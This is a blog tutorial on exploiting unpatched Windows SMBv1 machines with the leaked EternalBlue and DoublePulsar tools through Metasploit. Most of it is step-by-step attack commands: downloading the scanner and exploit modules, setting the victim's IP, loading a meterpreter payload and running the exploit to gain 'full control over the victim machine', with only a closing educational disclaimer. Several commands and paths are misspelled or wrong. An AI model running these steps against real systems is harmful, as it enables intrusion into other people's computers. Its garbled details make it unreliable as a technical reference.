eternalblue-doublepulsa
Security

How To Use EternalBlue and DoublePulsar Exploit to Hack Windows Machine

The exploit EternalBlue is a malware which is developed by the National Security Agency (NSA) that is used in exploiting windows bsaed sever message block (SMBv!) for short, and the tool is believed to be released by a group hackers popularly known as the Shadow Brokers hackers group in April 2017 and it has been used in some recent attacks such as the Wannacry cyber attack.

The SMB version 1 (SMBv1) comes in various versions of Microsoft Windows accepts specially crafted packets from remote attackers, which is the reason for this vulnerability existed with windows operating system which leads to perform Remote Code Execution which particularly targeted Windows 7 and Windows XP.

The hackers have also received the NSA Tool Called DOUBLEPULSARit is designed to provide covert and backdoor access to a Windows machine.

Once DOUBLEPULSAR is installed in the machine, it waits for certain types of data to be sent over port 445. When DOUBLEPULSAR  arrives, the implant provides a distinctive response to the attacker.

Using EternalBlue with Metasploit in a simple step

In order to make use of the tool we will need to download and add the Scanner and exploit to Metasploit. Open your Terminal windows and Type following commands.

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

After the download is finished, we write down the next command in the terminal

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Next you move the file smb_ms17_010.rb under the folder use/share/metasploit-framework/modules/auxiliary/scanner/smb

And then you should copy Eternal Blue-Doublepulsar.rb and debs to under use/share/metasploit-framework/modules/exploits/windows/smb

Now Open the Eternal Blue-Doublepulsar.rb with any Editor and change the path directory for ETERNALBLUE and DOUBLEPULSAR to smb exploit directory use/share/metasploit-framework/modules/exploits/windows/smb.

Then we should specify the name of the process to be injected, you can specify any process of your choice to be injected.

Then you should launch msfconsole and use the auxiliary scan module  smb_ms17_010.rb.

> use auxiliary/scanner/smb/smb_ms17_010
> show options

Now you should set the RHOSTS IP which is the Victims IP address.

> set RHOSTS IP
> run

It will go and scan the the host and check if the host is vulnerable or not and also display the victim machine details.

Now we can move to the exploit EternalBlue & DoublePulsa

use exploit/windows/smb/eternalblue_doublepulsar
> set payload windows.x64/meterpreter/bind_tcp
> show options

Then you will now set a target architecture and then RHOST Victim IP address.

> setRHOST IP
> set targetarchitecture x64
> show options

And then type exploit or run and hit enter.

Boom! It’s done now if we did everything correctly we will have the meterpreter session and the vulnerability has been exploited.

However, now the system has been exploited successfully and we have full control over the victim machine now.

If this article has made a good impact to your knowledge feel free to share with us through Facebook

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. Any misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.flexicron.com  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law. Thank you.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: